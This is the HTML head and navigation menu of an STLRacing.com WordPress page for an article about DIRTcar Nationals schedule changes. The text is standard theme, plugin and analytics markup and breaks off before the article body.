<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]-->
<head>
    <title>DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience - STLRacing.com</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="https://www.stlracing.com/xmlrpc.php" />
    <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO plugin v19.11 - https://yoast.com/wordpress/plugins/seo/ -->
	<link rel="canonical" href="https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience - STLRacing.com" />
	<meta property="og:description" content="World of Outlaws Sprint Cars and Late Models to contend for $20K to win in respective Saturday finales BARBERVILLE, FL (Nov. 29, 2022) – Entering the 52nd DIRTcar Nationals at Volusia Speedway Park, Feb. 6-18, fans and drivers will be treated to an enhanced schedule and several purse increases, including Saturday night World of Outlaws [&hellip;]" />
	<meta property="og:url" content="https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/" />
	<meta property="og:site_name" content="STLRacing.com" />
	<meta property="article:publisher" content="https://www.facebook.com/STLRacing/" />
	<meta property="article:published_time" content="2022-11-29T19:21:58+00:00" />
	<meta property="og:image" content="https://www.stlracing.com/wp-content/uploads/2022/11/DCN_2022_byAndyNewsome.jpg" />
	<meta property="og:image:width" content="1172" />
	<meta property="og:image:height" content="720" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="author" content="jdearing" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@stlracing" />
	<meta name="twitter:site" content="@stlracing" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="jdearing" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="4 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">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</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel="alternate" type="application/rss+xml" title="STLRacing.com &raquo; Feed" href="https://www.stlracing.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="STLRacing.com &raquo; Comments Feed" href="https://www.stlracing.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="STLRacing.com &raquo; DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience Comments Feed" href="https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/feed/" />
		<!-- This site uses the Google Analytics by MonsterInsights plugin v8.10.1 - Using Analytics tracking - https://www.monsterinsights.com/ -->
							<script
				src="//www.googletagmanager.com/gtag/js?id=UA-12737362-1"  data-cfasync="false" data-wpfc-render="false" type="text/javascript" async></script>
			<script data-cfasync="false" data-wpfc-render="false" type="text/javascript">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</script>
				<!-- / Google Analytics by MonsterInsights -->
		<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.stlracing.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=acb127199a2a3a18b0ec36d154fb29d1"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.1.1/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.1.1/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.1.1/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='classic-theme-styles-css' href='https://c0.wp.com/c/6.1.1/wp-includes/css/classic-themes.min.css' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='thumbs_rating_styles-css' href='https://www.stlracing.com/wp-content/plugins/link-library/upvote-downvote/css/style.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css' href='https://www.stlracing.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.2.12' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
<link rel='stylesheet' id='wp-pagenavi-css' href='https://www.stlracing.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<link rel='stylesheet' id='wordpress-popular-posts-css-css' href='https://www.stlracing.com/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css?ver=acb127199a2a3a18b0ec36d154fb29d1' type='text/css' media='all' />
<link rel='stylesheet' id='td-plugin-multi-purpose-css' href='https://www.stlracing.com/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=e815948e5c9ec5801de67b92a1d5a59fxx' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css' href='https://fonts.googleapis.com/css?family=Heebo%3A400%2C500%2C700%7COpen+Sans%3A400%2C600%2C700%2C500%7CRoboto%3A400%2C500%2C700&#038;display=swap&#038;ver=12.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='wpbdp-widgets-css' href='https://www.stlracing.com/wp-content/plugins/business-directory-plugin/assets/css/widgets.min.css?ver=6.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='tablepress-default-css' href='https://www.stlracing.com/wp-content/plugins/tablepress/css/default.min.css?ver=1.14' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css' href='https://www.stlracing.com/wp-content/themes/Newspaper/style.css?ver=12.1.1' type='text/css' media='all' />
<style id='td-theme-inline-css' type='text/css'>
    
        @media (max-width: 767px) {
            .td-header-desktop-wrap {
                display: none;
            }
        }
        @media (min-width: 767px) {
            .td-header-mobile-wrap {
                display: none;
            }
        }
    
	
</style>
<link rel='stylesheet' id='photonic-slider-css' href='https://www.stlracing.com/wp-content/plugins/photonic/include/ext/splide/splide.min.css?ver=20220823-124425' type='text/css' media='all' />
<link rel='stylesheet' id='photonic-lightbox-css' href='https://www.stlracing.com/wp-content/plugins/photonic/include/ext/spotlight/spotlight.min.css?ver=20220823-124425' type='text/css' media='all' />
<link rel='stylesheet' id='photonic-css' href='https://www.stlracing.com/wp-content/plugins/photonic/include/css/front-end/core/photonic.min.css?ver=20220823-124425' type='text/css' media='all' />
<style id='photonic-inline-css' type='text/css'>
/* Retrieved from saved CSS */
.photonic-panel { background:  rgb(17,17,17)  !important;

	border-top: none;
	border-right: none;
	border-bottom: none;
	border-left: none;
 }
.photonic-flickr-stream .photonic-pad-photosets { margin: 10px; }
.photonic-flickr-stream .photonic-pad-galleries { margin: 10px; }
.photonic-flickr-stream .photonic-pad-photos { padding: 5px 10px; }
.photonic-google-stream .photonic-pad-photos { padding: 5px 10px; }
.photonic-zenfolio-stream .photonic-pad-photos { padding: 5px 10px; }
.photonic-zenfolio-stream .photonic-pad-photosets { margin: 5px 10px; }
.photonic-instagram-stream .photonic-pad-photos { padding: 5px 10px; }
.photonic-smug-stream .photonic-pad-albums { margin: 3px; }
.photonic-smug-stream .photonic-pad-photos { padding: 5px 1px; }
.photonic-random-layout .photonic-thumb { padding: 1px}
.photonic-masonry-layout .photonic-thumb { padding: 1px}
.photonic-mosaic-layout .photonic-thumb { padding: 1px}

</style>
<link rel='stylesheet' id='default-styles-css' href='https://www.stlracing.com/wp-content/plugins/business-directory-plugin/themes/default/assets/styles.css?ver=6.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-legacy-framework-front-style-css' href='https://www.stlracing.com/wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=e815948e5c9ec5801de67b92a1d5a59fxx' type='text/css' media='all' />
<link rel='stylesheet' id='td-standard-pack-framework-front-style-css' href='https://www.stlracing.com/wp-content/plugins/td-standard-pack/Newspaper/assets/css/td_standard_pack_main.css?ver=48767bfdc5698c9103b4ef9b700012fd' type='text/css' media='all' />
<link rel='stylesheet' id='tdb_style_cloud_templates_front-css' href='https://www.stlracing.com/wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=87b3292f51aec51c00e6ce7db9b73ed1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/11.5.1/css/jetpack.css' type='text/css' media='all' />
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.10.1' id='monsterinsights-frontend-script-js'></script>
<script data-cfasync="false" data-wpfc-render="false" type="text/javascript" id='monsterinsights-frontend-script-js-extra'>/* <![CDATA[ */
var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"https:\/\/www.stlracing.com","hash_tracking":"false","ua":"UA-12737362-1","v4_id":""};/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<script type='text/javascript' id='thumbs_rating_scripts-js-extra'>
/* <![CDATA[ */
var thumbs_rating_ajax = {"ajax_url":"https:\/\/www.stlracing.com\/wp-admin\/admin-ajax.php","nonce":"29c6791e2a"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/link-library/upvote-downvote/js/general.js?ver=4.0.1' id='thumbs_rating_scripts-js'></script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.0.7' id='tp-tools-js'></script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.2.12' id='revmin-js'></script>
<script type='application/json' id='wpp-json'>
{"sampling_active":0,"sampling_rate":100,"ajax_url":"https:\/\/www.stlracing.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts","api_url":"https:\/\/www.stlracing.com\/wp-json\/wordpress-popular-posts","ID":72666,"token":"9bc15488d6","lang":0,"debug":0}
</script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js?ver=acb127199a2a3a18b0ec36d154fb29d1' id='wpp-js-js'></script>
<link rel="https://api.w.org/" href="https://www.stlracing.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.stlracing.com/wp-json/wp/v2/posts/72666" /><link rel='shortlink' href='https://www.stlracing.com/?p=72666' />
<link rel="alternate" type="application/json+oembed" href="https://www.stlracing.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.stlracing.com%2F2022%2F11%2F29%2Fdirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.stlracing.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.stlracing.com%2F2022%2F11%2F29%2Fdirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience%2F&#038;format=xml" />
	<style>img#wpstats{display:none}</style>
		            <style id="wpp-loading-animation-styles">@-webkit-keyframes bgslide{from{background-position-x:0}to{background-position-x:-200%}}@keyframes bgslide{from{background-position-x:0}to{background-position-x:-200%}}.wpp-widget-placeholder,.wpp-widget-block-placeholder{margin:0 auto;width:60px;height:3px;background:#dd3737;background:linear-gradient(90deg,#dd3737 0%,#571313 10%,#dd3737 100%);background-size:200% auto;border-radius:3px;-webkit-animation:bgslide 1s infinite linear;animation:bgslide 1s infinite linear}</style>
            <!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
        <script>
        window.tdb_globals = {"wpRestNonce":"9bc15488d6","wpRestUrl":"https:\/\/www.stlracing.com\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%day%\/%postname%\/","globalSettings":{"tdcSavingHistory":false},"isAjax":false,"isAdminBarShowing":false,"autoloadScrollPercent":50,"postAutoloadStatus":"off","origPostEditUrl":null};
    </script>
    
    <style id="tdb-global-colors">
        :root {--accent-color: #fff;}
    </style>
	
			<script>
				window.tdwGlobal = {"adminUrl":"https:\/\/www.stlracing.com\/wp-admin\/","wpRestNonce":"9bc15488d6","wpRestUrl":"https:\/\/www.stlracing.com\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%day%\/%postname%\/"};
			</script>
			    <script>
        window.tdaGlobal = {"adminUrl":"https:\/\/www.stlracing.com\/wp-admin\/","wpRestNonce":"9bc15488d6","wpRestUrl":"https:\/\/www.stlracing.com\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%day%\/%postname%\/","postId":72666};
    </script>
    			<style type="text/css">
				/* If html does not have either class, do not show lazy loaded images. */
				html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image {
					display: none;
				}
			</style>
			<script>
				document.documentElement.classList.add(
					'jetpack-lazy-images-js-enabled'
				);
			</script>
		<meta name="generator" content="Powered by Slider Revolution 6.2.12 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." />

<!-- JS generated by theme -->

<script>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</script>


<!-- Header style compiled by theme -->

<style>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</style>




<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BreadcrumbList",
        "itemListElement": [
            {
                "@type": "ListItem",
                "position": 1,
                "item": {
                    "@type": "WebSite",
                    "@id": "https://www.stlracing.com/",
                    "name": "Home"
                }
            },
            {
                "@type": "ListItem",
                "position": 2,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://www.stlracing.com/category/dirt-late-model-news/",
                    "name": "Dirt Late Model News"
                }
            }
            ,{
                "@type": "ListItem",
                "position": 3,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://www.stlracing.com/2022/11/29/dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience/",
                    "name": "DIRTcar Nationals Makes Schedule Updates to Enhance Driver, Fan Experience"                                
                }
            }    
        ]
    }
</script>
<script type="text/javascript">function setREVStartSize(e){
			//window.requestAnimationFrame(function() {				 
				window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW;	
				window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;	
				try {								
					var pw = document.getElementById(e.c).parentNode.offsetWidth,
						newh;
					pw = pw===0 || isNaN(pw) ? window.RSIW : pw;
					e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);
					e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw);
					e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);
					e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);
					e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);
					e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);
					e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);		
					if(e.layout==="fullscreen" || e.l==="fullscreen") 						
						newh = Math.max(e.mh,window.RSIH);					
					else{					
						e.gw = Array.isArray(e.gw) ? e.gw : [e.gw];
						for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];					
						e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el;
						e.gh = Array.isArray(e.gh) ? e.gh : [e.gh];
						for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];
											
						var nl = new Array(e.rl.length),
							ix = 0,						
							sl;					
						e.tabw = e.tabhide>=pw ? 0 : e.tabw;
						e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw;
						e.tabh = e.tabhide>=pw ? 0 : e.tabh;
						e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh;					
						for (var i in e.rl) nl[i] = e.rl[i]<window.RSIW ? 0 : e.rl[i];
						sl = nl[0];									
						for (var i in nl) if (sl>nl[i] && nl[i]>0) { sl = nl[i]; ix=i;}															
						var m = pw>(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]);					
						newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);
					}				
					if(window.rs_init_css===undefined) window.rs_init_css = document.head.appendChild(document.createElement("style"));					
					document.getElementById(e.c).height = newh+"px";
					window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }";				
				} catch(e){
					console.log("Failure at Presize of Slider:" + e)
				}					   
			//});
		  };</script>

<!-- Button style compiled by theme -->

<style>
    .tdm_block_column_content:hover .tdm-col-content-title-url .tdm-title,
                .tds-button2 .tdm-btn-text,
                .tds-button2 i,
                .tds-button5:hover .tdm-btn-text,
                .tds-button5:hover i,
                .tds-button6 .tdm-btn-text,
                .tds-button6 i,
                .tdm_block_list .tdm-list-item i,
                .tdm_block_pricing .tdm-pricing-feature i,
                body .tdm-social-item i {
                    color: #dd2525;
                }
                .tds-button1,
                .tds-button6:after,
                .tds-title2 .tdm-title-line:after,
                .tds-title3 .tdm-title-line:after,
                .tdm_block_pricing.tdm-pricing-featured:before,
                .tdm_block_pricing.tds_pricing2_block.tdm-pricing-featured .tdm-pricing-header,
                .tds-progress-bar1 .tdm-progress-bar:after,
                .tds-progress-bar2 .tdm-progress-bar:after,
                .tds-social3 .tdm-social-item {
                    background-color: #dd2525;
                }
                .tds-button2:before,
                .tds-button6:before,
                .tds-progress-bar3 .tdm-progress-bar:after {
                  border-color: #dd2525;
                }
                .tdm-btn-style1 {
					background-color: #dd2525;
				}
				.tdm-btn-style2:before {
				    border-color: #dd2525;
				}
				.tdm-btn-style2 {
				    color: #dd2525;
				}
				.tdm-btn-style3 {
				    -webkit-box-shadow: 0 2px 16px #dd2525;
                    -moz-box-shadow: 0 2px 16px #dd2525;
                    box-shadow: 0 2px 16px #dd2525;
				}
				.tdm-btn-style3:hover {
				    -webkit-box-shadow: 0 4px 26px #dd2525;
                    -moz-box-shadow: 0 4px 26px #dd2525;
                    box-shadow: 0 4px 26px #dd2525;
				}
</style>

	<style id="tdw-css-placeholder"></style></head>

<body class="post-template-default single single-post postid-72666 single-format-standard td-standard-pack dirtcar-nationals-makes-schedule-updates-to-enhance-driver-fan-experience global-block-template-1 td-black-pro wpbdp-with-button-styles  tdc-header-template  tdc-footer-template td-animation-stack-type0 td-boxed-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">

            <div class="td-scroll-up  td-hide-scroll-up-on-mob" style="display:none;"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background" style="visibility:hidden"></div>
<div id="td-mobile-nav" style="visibility:hidden">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/STLRacing" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/stlracing/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.twitter.com/stlracing" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#" aria-label="Close"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-main-menu-container"><ul id="menu-main-menu" class="td-mobile-main-menu"><li id="menu-item-30125" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first menu-item-30125"><a href="https://www.stlracing.com">HOME</a></li>
<li id="menu-item-30128" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30128"><a href="https://www.stlracing.com/community">Forums</a></li>
<li id="menu-item-30133" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30133"><a href="https://www.stlracingphotos.com">Photos<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-30135" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30135"><a href="https://www.stlracingphotos.com">STLRacingPhotos.com Photos</a></li>
	<li id="menu-item-30136" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30136"><a href="https://www.stlracingphotos.com/Federated-Auto-Parts-Raceway">I-55 Raceway Photos</a></li>
	<li id="menu-item-30134" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30134"><a href="https://www.stlracing.com/gallery">Old User Photos<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-31334" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31334"><a href="https://www.stlracing.com/classic-photos/tmp-allied-auto-racing-association-classic-photos/">TMP Allied Auto Racing Association Classic Photos</a></li>
		<li id="menu-item-31336" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31336"><a href="https://www.stlracing.com/classic-photos/tmp-belle-clair-speedway-classic-photos/">TMP Belle-Clair Speedway Classic Photos</a></li>
		<li id="menu-item-31337" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31337"><a href="https://www.stlracing.com/classic-photos/tmp-godfrey-speedway-classic-photos/">TMP Godfrey Speedway Classic Photos</a></li>
		<li id="menu-item-31340" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31340"><a href="https://www.stlracing.com/classic-photos/highland-speedway-classic-photos/">TMP Highland Speedway Classic Photos</a></li>
		<li id="menu-item-31338" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31338"><a href="https://www.stlracing.com/classic-photos/tmp-i-55-raceway-classic-photos/">TMP I-55 Raceway Classic Photos</a></li>
		<li id="menu-item-31335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31335"><a href="https://www.stlracing.com/classic-photos/tmp-st-charles-speedway-classic-photos/">TMP St. Charles Speedway Classic Photos</a></li>
		<li id="menu-item-31339" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31339"><a href="https://www.stlracing.com/classic-photos/tmp-tri-city-speedway-classic-photos/">TMP Tri-City Speedway Classic Photos</a></li>
		<li id="menu-item-31341" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31341"><a href="https://www.stlracing.com/classic-photos/tri-city-speedway-classic-photos-1/">Tri-City Speedway Classic Photos</a></li>
	</ul>
</li>
</ul>
</li>
<li id="menu-item-30137" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30137"><a href="https://www.stlracing.com/directory">Racing Links<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-30138" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-has-children menu-item-30138"><a href="https://www.stlracing.com/directory/links_category/drivers-race-teams/">Drivers Websites<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-30169" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30169"><a href="https://www.stlracing.com/directory/links_category/late-model-drivers/">Late Model Drivers</a></li>
		<li id="menu-item-30170" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30170"><a href="https://www.stlracing.com/directory/links_category/sprint-car-drivers/">Sprint Car Drivers</a></li>
		<li id="menu-item-30171" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30171"><a href="https://www.stlracing.com/directory/links_category/modified-drivers/">Modified Drivers</a></li>
		<li id="menu-item-30233" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30233"><a href="https://www.stlracing.com/directory/links_category/northeast-modified-drivers/">Northeast Modified Drivers</a></li>
		<li id="menu-item-30172" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30172"><a href="https://www.stlracing.com/directory/links_category/midget-drivers/">Midget Drivers</a></li>
		<li id="menu-item-30174" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30174"><a href="https://www.stlracing.com/directory/links_category/micro-sprint-drivers/">Micro Sprint Drivers</a></li>
		<li id="menu-item-30173" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30173"><a href="https://www.stlracing.com/directory/links_category/stock-car-drivers/">Stock Car Drivers</a></li>
	</ul>
</li>
	<li id="menu-item-30139" class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30139"><a href="https://www.stlracing.com/directory/links_category/racing-sanctioning-organizations/">Sanctioning Bodies</a></li>
</ul>
</li>
<li id="menu-item-30145" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30145"><a href="http://www.stlracing.com/events/">Events</a></li>
<li id="menu-item-36284" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-36284"><a href="https://www.stlracing.com/category/driver-profiles/">Driver Profiles<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-36348" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36348"><a href="https://www.stlracing.com/submit-driver-profile/">Submit Driver Profile</a></li>
	<li id="menu-item-36285" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-36285"><a href="https://www.stlracing.com/category/driver-profiles/2016-driver-profiles/">2016 Driver Profiles<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-36606" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36606"><a href="https://www.stlracing.com/driver-profiles/late-models/">Late Models</a></li>
		<li id="menu-item-36605" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36605"><a href="https://www.stlracing.com/driver-profiles/modifieds-b-modifieds/">Modifieds – B-Modifieds</a></li>
		<li id="menu-item-36602" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36602"><a href="https://www.stlracing.com/driver-profiles/sprints-midgets-micros/">Sprints – Midgets – Micros</a></li>
		<li id="menu-item-36604" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36604"><a href="https://www.stlracing.com/driver-profiles/stock-cars-sportsman/">Stock Cars – Sportsman</a></li>
		<li id="menu-item-36603" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36603"><a href="https://www.stlracing.com/driver-profiles/sport-compacts/">Sport Compacts</a></li>
	</ul>
</li>
</ul>
</li>
<li id="menu-item-31280" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31280"><a href="https://www.stlracing.com/facebook-feeds/">Facebook Feeds<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
